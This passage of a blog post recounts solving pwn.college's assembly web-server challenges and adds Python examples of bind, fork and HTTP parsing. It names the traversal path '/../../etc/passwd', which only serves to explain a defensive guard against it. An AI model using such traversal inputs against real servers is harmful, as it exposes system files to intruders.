&lt;p&gt;The rest, the majority, I solved on my own, using &lt;code&gt;strace&lt;/code&gt;, &lt;code&gt;gdb&lt;/code&gt;, the man pages, and a lot of trial and error.&lt;/p&gt;

&lt;p&gt;Why am I telling you this? Because pretending I never needed help would be a lie. Getting stuck is normal. Asking for help, as long as you actually learn from it, is part of the process too. The goal isn't to be "pure." The goal is to understand.&lt;/p&gt;

&lt;p&gt;And I understand this material now. That's what matters.&lt;/p&gt;

&lt;p&gt;So instead of giving you code, I'm going to tell you what I learned. The concepts. The syscalls. The mistakes. The "aha!" moments. If you're working through the same dojo, this post will point you in the right direction, but you'll still have to do the work yourself.&lt;/p&gt;

&lt;h3&gt;
  
  
  Before the Web Server
&lt;/h3&gt;

&lt;p&gt;Before I ever wrote a single line of HTTP response in assembly, I had to learn how computers actually work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt;'s Computing 101 dojo isn't gentle. It throws you into the deep end and expects you to swim. Before reaching the "Building a Web Server" module, I completed eight modules in order:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Your First Program&lt;/strong&gt; (5 challenges): how to make a program exit. Syscall 60, if you're counting.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Computer Memory&lt;/strong&gt; (7 challenges): pointers are just numbers, memory is just bytes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The Stack&lt;/strong&gt; (4 challenges): push, pop, call, ret, how functions really work.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Software Introspection&lt;/strong&gt; (12 challenges): &lt;code&gt;strace&lt;/code&gt;, &lt;code&gt;ltrace&lt;/code&gt;, &lt;code&gt;gdb&lt;/code&gt;, watching programs from the outside.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output and Input&lt;/strong&gt; (6 challenges): &lt;code&gt;read&lt;/code&gt; and &lt;code&gt;write&lt;/code&gt; are all you need.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Control Flow&lt;/strong&gt; (7 challenges): jumps, compares, loops, the logic of everything.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assembly Assortment&lt;/strong&gt; (4 challenges): bitwise ops, shifts, condition codes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assembly Crash Course&lt;/strong&gt; (30 challenges): pure x86-64 assembly. 30 of them.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Total before the web server: 75 assembly programs.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;By the time I reached "Building a Web Server," I had stared at register values until my eyes hurt. I had learned that &lt;code&gt;mov&lt;/code&gt; is not a copy, it's a transfer. I had earned the right to be confused, stuck, and then unstuck.&lt;/p&gt;

&lt;p&gt;So when I started the web server module, I wasn't starting from zero. I was starting from "I understand the stack, I understand syscalls, I understand that nothing is handed to me."&lt;/p&gt;

&lt;p&gt;And I still spent a lot of time on it.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Web Server Module: 11 Challenges
&lt;/h3&gt;

&lt;p&gt;Here's the journey, what each challenge taught me, without giving away the actual code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 1: Exit
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Write a program that calls the &lt;code&gt;exit&lt;/code&gt; syscall with status 0.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; Every program needs an exit. The kernel doesn't know you're done unless you tell it. The syscall convention on x86-64 Linux is: syscall number in &lt;code&gt;rax&lt;/code&gt;, first argument in &lt;code&gt;rdi&lt;/code&gt;, then &lt;code&gt;syscall&lt;/code&gt;. That's the foundation everything else builds on.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Nowhere on this one. It's the warm-up.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 2: Socket
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Create a TCP socket for IPv4.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; You can't just write &lt;code&gt;AF_INET&lt;/code&gt; and &lt;code&gt;SOCK_STREAM&lt;/code&gt; in assembly, those are C macros. You have to find the actual integer values. I learned to &lt;code&gt;grep&lt;/code&gt; through &lt;code&gt;/usr/include&lt;/code&gt; to find them. Turns out &lt;code&gt;AF_INET&lt;/code&gt; is 2 and &lt;code&gt;SOCK_STREAM&lt;/code&gt; is 1. The &lt;code&gt;socket&lt;/code&gt; syscall returns a file descriptor that you'll use for everything else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Nothing major. But it made me appreciate what the C preprocessor actually does.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 3: Bind
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Attach my socket to port 80 so clients could find it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; &lt;code&gt;bind&lt;/code&gt; takes a pointer to a &lt;code&gt;sockaddr_in&lt;/code&gt; structure: 16 bytes of raw memory that you have to construct yourself. I learned what each field means: address family (2 bytes, host byte order), port (2 bytes in network byte order, big-endian), IP address (4 bytes, also network byte order), and padding (8 bytes of zeros). Endianness matters: port 80 (&lt;code&gt;0x0050&lt;/code&gt;) has to land in memory as the bytes &lt;code&gt;00 50&lt;/code&gt;, which a little-endian register load reads back as &lt;code&gt;0x5000&lt;/code&gt;. Store 80 with a plain 16-bit &lt;code&gt;mov&lt;/code&gt; instead and the kernel sees port 20480.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; This was my first real wall. I kept getting &lt;code&gt;bind&lt;/code&gt; failures because I had the port byte order wrong. &lt;code&gt;strace&lt;/code&gt; and the &lt;code&gt;bind&lt;/code&gt; man page eventually saved me.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 4: Listen
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Turn my bound socket into a passive listener.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; A socket created with &lt;code&gt;socket()&lt;/code&gt; is "active": it expects to initiate connections. &lt;code&gt;listen()&lt;/code&gt; makes it "passive" so it can receive incoming connections. The backlog parameter tells the kernel how many completed connections it may queue while your program hasn't called &lt;code&gt;accept&lt;/code&gt; yet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; I initially forgot that &lt;code&gt;listen&lt;/code&gt; needs to be called after &lt;code&gt;bind&lt;/code&gt; but before &lt;code&gt;accept&lt;/code&gt;. My program hung forever until I looked up the correct order.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 5: Accept
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Wait for a client to connect and get a new file descriptor for that client.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; &lt;code&gt;accept&lt;/code&gt; blocks, it puts your program to sleep until someone connects. That's actually good, the kernel handles the waiting efficiently. When a client connects, &lt;code&gt;accept&lt;/code&gt; returns a new file descriptor just for talking to that client. The original listening socket stays open for more connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; I accidentally overwrote my listening socket fd with the client fd and lost the ability to accept more connections. Had to carefully separate my register usage.&lt;/p&gt;
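&lt;p&gt;The &lt;code&gt;socket&lt;/code&gt; → &lt;code&gt;bind&lt;/code&gt; → &lt;code&gt;listen&lt;/code&gt; → &lt;code&gt;accept&lt;/code&gt; sequence from Challenges 2 to 5, as an added example; it is not code from this post or a dojo solution. It is Python rather than assembly so it runs anywhere, but the 16-byte &lt;code&gt;sockaddr_in&lt;/code&gt; is built by hand exactly the way the assembly has to build it, and handed to the kernel's &lt;code&gt;bind&lt;/code&gt; through &lt;code&gt;ctypes&lt;/code&gt; rather than Python's tuple-based wrapper, so the byte-order mistake from Challenge 3 is visible as bytes. Assumptions of this example: a little-endian x86-64 Linux host (for the &lt;code&gt;sin_family&lt;/code&gt; bytes and for &lt;code&gt;CDLL(None)&lt;/code&gt;), and 127.0.0.1 on an ephemeral port (port 0) instead of port 80, which needs root. The helper names are this example's own.&lt;/p&gt;

```python
import ctypes
import os
import socket
import struct

# Values the assembly has to dig out of /usr/include (AF_INET = 2, SOCK_STREAM = 1).
AF_INET = 2
SOCK_STREAM = 1


def sockaddr_in_bytes(port, ip="0.0.0.0"):
    """Build the 16-byte struct sockaddr_in by hand.

    Layout: sin_family (2 bytes, host order), sin_port (2 bytes, network order,
    i.e. big-endian), sin_addr (4 bytes, network order), sin_zero (8 bytes).
    '=H' packs in native byte order with no padding; '!H' packs big-endian.
    """
    return (struct.pack("=H", AF_INET)
            + struct.pack("!H", port)
            + socket.inet_aton(ip)
            + bytes(8))


def sockaddr_in_bytes_wrong(port, ip="0.0.0.0"):
    """The Challenge 3 mistake: the port stored in host (little-endian) order."""
    return (struct.pack("=H", AF_INET)
            + struct.pack("=H", port)
            + socket.inet_aton(ip)
            + bytes(8))


def bind_raw(fd, addr):
    """Call bind(2) with our raw bytes, bypassing Python's tuple-based wrapper."""
    libc = ctypes.CDLL(None, use_errno=True)
    rc = libc.bind(fd, addr, len(addr))
    if rc != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))


def listening_socket(port, ip="127.0.0.1", backlog=16):
    """socket(2) -> bind(2) -> listen(2); the order matters (Challenge 4)."""
    listener = socket.socket(AF_INET, SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    bind_raw(listener.fileno(), sockaddr_in_bytes(port, ip))
    listener.listen(backlog)
    return listener


def accept_and_greet(listener, banner=b"HTTP/1.0 200 OK\r\n\r\n"):
    """accept(2) blocks until a client connects, then returns a NEW fd for it.

    The listener stays open for further accept() calls (Challenge 5). Returns
    the number of bytes written to the client.
    """
    client, _peer = listener.accept()
    written = os.write(client.fileno(), banner)   # write(2) on the client fd, not the listener
    client.close()                                # close(2): otherwise fds leak (Challenge 8)
    return written


if __name__ == "__main__":
    srv = listening_socket(0)
    print("listening on", srv.getsockname())
    accept_and_greet(srv)
```

&lt;p&gt;Compare the third and fourth bytes of the two builders: &lt;code&gt;00 50&lt;/code&gt; binds port 80, &lt;code&gt;50 00&lt;/code&gt; binds port 20480, and &lt;code&gt;strace&lt;/code&gt; shows exactly which one the kernel received.&lt;/p&gt;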

&lt;h4&gt;
  
  
  Challenge 6: Static Response
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Send a fixed HTTP response ("HTTP/1.0 200 OK\r\n\r\n") to any client that connects.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; This is where assembly stops being abstract. You can't just write &lt;code&gt;printf(...)&lt;/code&gt;. You have to put those bytes in memory yourself, one byte at a time. I also learned that HTTP uses &lt;code&gt;\r\n&lt;/code&gt; for line endings, and a blank line (&lt;code&gt;\r\n\r\n&lt;/code&gt;) separates headers from body.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Counting bytes. I miscounted the response length and the checker failed me because the response was truncated. Staring at hex dumps fixed it.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 7: Dynamic Response
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Parse the GET request, extract the file path, open that file, read its contents, and send them back.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; Parsing HTTP manually means scanning byte by byte. Find the space after "GET", find the next space after the path, null-terminate the path string. Then &lt;code&gt;open&lt;/code&gt; with &lt;code&gt;O_RDONLY&lt;/code&gt;, &lt;code&gt;read&lt;/code&gt; the file into a buffer, and &lt;code&gt;write&lt;/code&gt; the header plus file contents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Off-by-one errors in finding the spaces. Also forgot to null-terminate the path string at first, so &lt;code&gt;open&lt;/code&gt; was getting garbage after the filename.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 8: Iterative GET Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Keep the server running after one request, handling multiple clients sequentially.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; One infinite loop. After handling a client and closing its fd, just jump back to &lt;code&gt;accept&lt;/code&gt;. The server stays alive forever. This is called an iterative server, one client at a time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; I forgot to close the client fd at the end of the loop. File descriptors leaked and eventually the server couldn't accept new connections.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 9: Concurrent GET Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Handle multiple clients at the same time using &lt;code&gt;fork()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; &lt;code&gt;fork()&lt;/code&gt; creates an exact copy of the running process. The parent gets the child's PID; the child gets 0. Parent closes the client fd and goes back to &lt;code&gt;accept&lt;/code&gt;. Child closes the listening socket and handles the request. Classic Unix pattern: parent listens, child handles.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Figuring out which process closes which file descriptor. Parent should never touch the request. Child should never call &lt;code&gt;accept&lt;/code&gt;. Getting this separation right took a few tries.&lt;/p&gt;
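&lt;p&gt;The parent/child split from Challenge 9, as an added example rather than code from this post. It uses &lt;code&gt;os.fork&lt;/code&gt;, &lt;code&gt;os.read&lt;/code&gt;, &lt;code&gt;os.write&lt;/code&gt;, &lt;code&gt;os.close&lt;/code&gt; and &lt;code&gt;os._exit&lt;/code&gt;, Python's thin wrappers over the same syscalls, on a loopback listener bound to an ephemeral port (this example's own choice). The rule it enforces is the one above: the parent closes the client fd and goes back to &lt;code&gt;accept&lt;/code&gt;; the child closes the listener, serves, and exits without ever calling &lt;code&gt;accept&lt;/code&gt;. One addition the post doesn't cover but any long-running fork server needs: the parent reaps finished children with &lt;code&gt;waitpid&lt;/code&gt;, otherwise they linger as zombies. The &lt;code&gt;max_clients&lt;/code&gt; argument and the returned pid list exist only so the loop can be exercised and checked.&lt;/p&gt;

```python
import os
import socket


def handle_client(client_fd):
    """Child side: read the request, send a fixed response, close the client fd.

    Only os.* calls, so each line maps one-to-one onto read/write/close(2).
    """
    request = os.read(client_fd, 4096)           # one read(2), as in the dojo
    os.write(client_fd, b"HTTP/1.0 200 OK\r\n\r\n")
    os.close(client_fd)
    return request


def reap_finished_children():
    """Non-blocking waitpid loop: collect every child that has already exited."""
    while True:
        try:
            done_pid, _status = os.waitpid(-1, os.WNOHANG)
        except ChildProcessError:
            return                               # no children left at all
        if done_pid == 0:
            return                               # children exist but none finished yet


def serve_forking(listener, max_clients=None):
    """Parent side: accept, fork, hand the client to the child, loop.

    Returns the pids of the children it spawned (all reaped before returning)
    so a caller can check that every client was served by a separate process.
    """
    listen_fd = listener.fileno()
    pids = []
    served = 0
    while max_clients is None or served != max_clients:
        client, _peer = listener.accept()
        client_fd = client.detach()              # take the raw fd out of the socket object
        pid = os.fork()
        if pid == 0:
            # CHILD: never touches the listener again, never calls accept.
            os.close(listen_fd)
            handle_client(client_fd)
            os._exit(0)                          # exit(2); never fall back into the parent's loop
        # PARENT: never touches the request.
        os.close(client_fd)
        pids.append(pid)
        served += 1
        reap_finished_children()
    for pid in pids:                             # wait for the stragglers before returning
        try:
            os.waitpid(pid, 0)
        except ChildProcessError:
            pass                                 # already reaped above
    return pids


if __name__ == "__main__":
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    print("listening on", srv.getsockname())
    serve_forking(srv)
```

&lt;p&gt;Run it under &lt;code&gt;strace -f&lt;/code&gt; and you see the same picture the assembly produces: the parent's trace is nothing but &lt;code&gt;accept4&lt;/code&gt;, &lt;code&gt;clone&lt;/code&gt;, &lt;code&gt;close&lt;/code&gt; and &lt;code&gt;wait4&lt;/code&gt;, while each child's trace is &lt;code&gt;close&lt;/code&gt; (the listener), &lt;code&gt;read&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;, &lt;code&gt;close&lt;/code&gt;, &lt;code&gt;exit_group&lt;/code&gt;.&lt;/p&gt;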

&lt;h4&gt;
  
  
  Challenge 10: Concurrent POST Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Handle POST requests by extracting the body and writing it to a file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; POST requests have a body after the headers. To find it, scan for &lt;code&gt;\r\n\r\n&lt;/code&gt;, the blank line that separates headers from body. Calculate body length = total bytes read minus header size. Open the file with &lt;code&gt;O_WRONLY | O_CREAT&lt;/code&gt; (flags 1 and 64 combined = 65), passing a permission mode as the third argument because &lt;code&gt;O_CREAT&lt;/code&gt; may create the file, and &lt;code&gt;write&lt;/code&gt; the body bytes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; This was the hardest challenge. The body parsing logic was tricky, scanning for four bytes in a row. I also kept miscalculating the body length. And there was a specific requirement from the checker about closing (or not closing) the client socket that took me a while to discover.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 11: Web Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Combine GET and POST into a single concurrent server.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; Check the first byte of the request: &lt;code&gt;'G'&lt;/code&gt; means GET, &lt;code&gt;'P'&lt;/code&gt; means POST. Branch to the right handler. Both send &lt;code&gt;200 OK&lt;/code&gt; when done. Both run inside &lt;code&gt;fork()&lt;/code&gt;. I moved the &lt;code&gt;200 OK&lt;/code&gt; response to the &lt;code&gt;.rodata&lt;/code&gt; section so I wasn't rebuilding it every time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Making sure the parent and child didn't step on each other. Clear separation of responsibilities was the key. By this point, I had enough confidence from the previous 10 challenges to put it all together myself.&lt;/p&gt;
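&lt;p&gt;The request handling from Challenges 7, 10 and 11 (request line, the &lt;code&gt;\r\n\r\n&lt;/code&gt; split, GET/POST dispatch), as an added example; it is not the post's code or a dojo solution, and the document root, status codes and helper names are this example's own. It also adds two checks a practitioner would want that the checker does not ask for: the request path is resolved under a document root before &lt;code&gt;open&lt;/code&gt;, so &lt;code&gt;/../../etc/passwd&lt;/code&gt; cannot climb out of it (handing the raw path to &lt;code&gt;open&lt;/code&gt;, as the challenges do, has no such guard), and the POST body length comes from &lt;code&gt;Content-Length&lt;/code&gt; rather than "bytes read minus header size", because a single &lt;code&gt;read&lt;/code&gt; may return only part of the body. &lt;code&gt;os.open&lt;/code&gt; is given an explicit mode, the third argument that &lt;code&gt;O_CREAT&lt;/code&gt; needs in the assembly as well.&lt;/p&gt;

```python
import os
from pathlib import Path

# open(2) flags the assembly passes as integers: O_WRONLY=1, O_CREAT=64, O_TRUNC=512 on Linux.
POST_FLAGS = os.O_WRONLY | os.O_CREAT | os.O_TRUNC


def split_request(raw):
    """Split a raw request into (method, path, headers, body).

    The blank line \\r\\n\\r\\n ends the headers; everything after it is body.
    Raises ValueError if the request line or the header terminator is missing.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if sep == b"":
        raise ValueError("headers not terminated")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def resolve_under_root(root, request_path):
    """Map the request path onto the filesystem and refuse anything outside root.

    The assembly hands the raw path to open(2); here it is resolved first so
    '/../../etc/passwd' cannot escape the document root. (No percent-decoding
    is done, so an encoded dot stays a literal filename and cannot traverse.)
    """
    root = Path(root).resolve()
    target = (root / request_path.lstrip("/")).resolve()
    if target != root and root not in target.parents:
        raise PermissionError("path escapes document root")
    return target


def handle_get(root, path):
    try:
        data = resolve_under_root(root, path).read_bytes()   # open(O_RDONLY) + read, Challenge 7
    except PermissionError:
        return b"HTTP/1.0 403 Forbidden\r\n\r\n"
    except (FileNotFoundError, IsADirectoryError, NotADirectoryError):
        return b"HTTP/1.0 404 Not Found\r\n\r\n"
    return b"HTTP/1.0 200 OK\r\n\r\n" + data


def handle_post(root, path, headers, body, read_more):
    """Write the body to the named file; read_more(n) fetches body bytes the first read missed."""
    try:
        target = resolve_under_root(root, path)
        length = int(headers.get(b"content-length", len(body)))
    except PermissionError:
        return b"HTTP/1.0 403 Forbidden\r\n\r\n"
    except ValueError:
        return b"HTTP/1.0 400 Bad Request\r\n\r\n"
    while length > len(body):                 # trust Content-Length, not "bytes read minus headers"
        chunk = read_more(length - len(body))
        if not chunk:
            return b"HTTP/1.0 400 Bad Request\r\n\r\n"
        body += chunk
    fd = os.open(target, POST_FLAGS, 0o644)    # the mode is the third argument O_CREAT needs
    try:
        os.write(fd, body[:length])
    finally:
        os.close(fd)
    return b"HTTP/1.0 200 OK\r\n\r\n"


def handle_request(root, raw, read_more=lambda n: b""):
    """Dispatch on the method; the assembly does this by testing the first byte ('G' or 'P')."""
    try:
        method, path, headers, body = split_request(raw)
    except ValueError:
        return b"HTTP/1.0 400 Bad Request\r\n\r\n"
    path = path.decode("ascii", "replace")
    if method == b"GET":
        return handle_get(root, path)
    if method == b"POST":
        return handle_post(root, path, headers, body, read_more)
    return b"HTTP/1.0 405 Method Not Allowed\r\n\r\n"
```

&lt;p&gt;In a server, &lt;code&gt;read_more&lt;/code&gt; is simply another &lt;code&gt;read&lt;/code&gt; on the client fd; the parameter is there so the short-read case can be driven without a socket.&lt;/p&gt;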

&lt;h3&gt;
  
  
  After the Web Server: Debugging Refresher
&lt;/h3&gt;

&lt;p&gt;After building the web server, I completed Debugging Refresher (8 challenges). This module taught me how to properly inspect what I had built:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;strace&lt;/code&gt; to trace every syscall my server made to the kernel. Incredibly useful for seeing exactly where something failed.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;gdb&lt;/code&gt; for breakpoints, stepping through instructions, inspecting registers and memory.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ltrace&lt;/code&gt; for library calls (though my server made none, pure syscalls only).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Without debugging skills, assembly is blind. With them, you can see everything.&lt;/p&gt;

&lt;h3&gt;
  
  
  What I Actually Learned
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The most important lesson
&lt;/h4&gt;

&lt;p&gt;I spent a lot of time on these challenges. I don't remember every instruction I wrote. But I remember this: &lt;strong&gt;I can figure things out and make them work.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That's not arrogance. That's earned confidence. Before &lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt;, I wasn't sure I could write anything meaningful in assembly. Now I know I can build a concurrent web server from scratch, no &lt;code&gt;libc&lt;/code&gt;, no runtime, just me and the kernel.&lt;/p&gt;

&lt;p&gt;Once you've done that, everything else feels possible.&lt;/p&gt;

&lt;h4&gt;
  
  
  What the previous modules gave me
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Syscall convention: number in &lt;code&gt;rax&lt;/code&gt;, arguments in &lt;code&gt;rdi&lt;/code&gt;, &lt;code&gt;rsi&lt;/code&gt;, &lt;code&gt;rdx&lt;/code&gt;, then &lt;code&gt;r10&lt;/code&gt;, &lt;code&gt;r8&lt;/code&gt;, &lt;code&gt;r9&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Stack discipline: &lt;code&gt;sub rsp, N&lt;/code&gt; to allocate, &lt;code&gt;add rsp, N&lt;/code&gt; to deallocate&lt;/li&gt;
&lt;li&gt;Register preservation: &lt;code&gt;rbx&lt;/code&gt;, &lt;code&gt;rbp&lt;/code&gt;, &lt;code&gt;r12&lt;/code&gt;-&lt;code&gt;r15&lt;/code&gt; survive function calls; everything else the callee may clobber&lt;/li&gt;
&lt;li&gt;Debugging: &lt;code&gt;gdb&lt;/code&gt; and &lt;code&gt;strace&lt;/code&gt; are your eyes into a running program&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  What the web server module taught me
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Socket syscalls create network endpoints&lt;/li&gt;
&lt;li&gt;HTTP is just text over TCP, parsed byte by byte&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;fork()&lt;/code&gt; is concurrency, simple, reliable, and ancient&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;\r\n\r\n&lt;/code&gt; is the most important 4-byte sequence in HTTP&lt;/li&gt;
&lt;li&gt;File descriptors are just integers; the child inherits a copy of each one on &lt;code&gt;fork()&lt;/code&gt;, pointing at the same open file, which is why each side has to close the one it doesn't use
&lt;/li&gt;
&lt;li&gt;Nothing is handed to you, but everything is possible&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  On getting help (the honest version)
&lt;/h4&gt;

&lt;p&gt;Using AI on a few challenges didn't give me the answers, it gave me direction. I still wrote the code. I still understood why it worked. And I made sure I could explain the solution in my own words before moving on.&lt;/p&gt;

&lt;p&gt;I think that's the right way to use AI in learning: as a tutor, not a crutch. Ask it to explain a concept, not to write the code for you. The difference matters.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Full Journey (94 Challenges)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Before the web server (75 challenges):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your First Program (5)&lt;/li&gt;
&lt;li&gt;Computer Memory (7)&lt;/li&gt;
&lt;li&gt;The Stack (4)&lt;/li&gt;
&lt;li&gt;Software Introspection (12)&lt;/li&gt;
&lt;li&gt;Output and Input (6)&lt;/li&gt;
&lt;li&gt;Control Flow (7)&lt;/li&gt;
&lt;li&gt;Assembly Assortment (4)&lt;/li&gt;
&lt;li&gt;Assembly Crash Course (30)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The web server (11 challenges):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Exit → &lt;code&gt;exit&lt;/code&gt; syscall&lt;/li&gt;
&lt;li&gt;Socket → &lt;code&gt;socket&lt;/code&gt; syscall, finding AF_INET and SOCK_STREAM&lt;/li&gt;
&lt;li&gt;Bind → &lt;code&gt;bind&lt;/code&gt; syscall, manual &lt;code&gt;sockaddr_in&lt;/code&gt;, endianness&lt;/li&gt;
&lt;li&gt;Listen → &lt;code&gt;listen&lt;/code&gt; syscall&lt;/li&gt;
&lt;li&gt;Accept → &lt;code&gt;accept&lt;/code&gt; syscall&lt;/li&gt;
&lt;li&gt;Static Response → hardcoded &lt;code&gt;write&lt;/code&gt;, byte-by-byte strings&lt;/li&gt;
&lt;li&gt;Dynamic Response → &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;read&lt;/code&gt;, file serving&lt;/li&gt;
&lt;li&gt;Iterative GET Server → infinite loop&lt;/li&gt;
&lt;li&gt;Concurrent GET Server → &lt;code&gt;fork&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Concurrent POST Server → body parsing, &lt;code&gt;open&lt;/code&gt; with O_CREAT&lt;/li&gt;
&lt;li&gt;Web Server → GET + POST + concurrency&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;After the web server (8 challenges):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Debugging Refresher (8)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Total: 94 challenges.&lt;/strong&gt; One dojo. One working web server in assembly.&lt;/p&gt;

&lt;h3&gt;
  
  
  If You Build Systems That Actually Matter
&lt;/h3&gt;

&lt;p&gt;I don't know who's reading this. But if you work on operating systems, embedded devices, aerospace or defense software, cybersecurity tooling, or anything where "it just works" isn't good enough and only "I understand exactly why it works" will do, then you know why this matters.&lt;/p&gt;

&lt;p&gt;I built this because I wanted to understand. Now I do.&lt;/p&gt;

&lt;h3&gt;
  
  
  Try It Yourself
&lt;/h3&gt;

&lt;p&gt;The Computing 101 dojo is free on &lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt;. Start with "Your First Program." See how far you get.&lt;/p&gt;

&lt;p&gt;If you get stuck, and you will, don't look for full solutions. Use &lt;code&gt;strace&lt;/code&gt;. Use &lt;code&gt;gdb&lt;/code&gt;. Read the man pages. Figure it out. That's where the learning happens.&lt;/p&gt;

&lt;p&gt;And if you're truly stuck after genuinely trying? Ask for help, but make sure you learn from it. That's what I did.&lt;/p&gt;

&lt;h3&gt;
  
  
  Acknowledgments
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt; and Arizona State University for building this. The checker program for never lying to me. The 75 assembly programs before this one that made it possible. And the AI tutor I asked for help on fewer than 5 challenges, not for answers, but for explanations that unblocked me.&lt;/p&gt;

&lt;h3&gt;
  
  
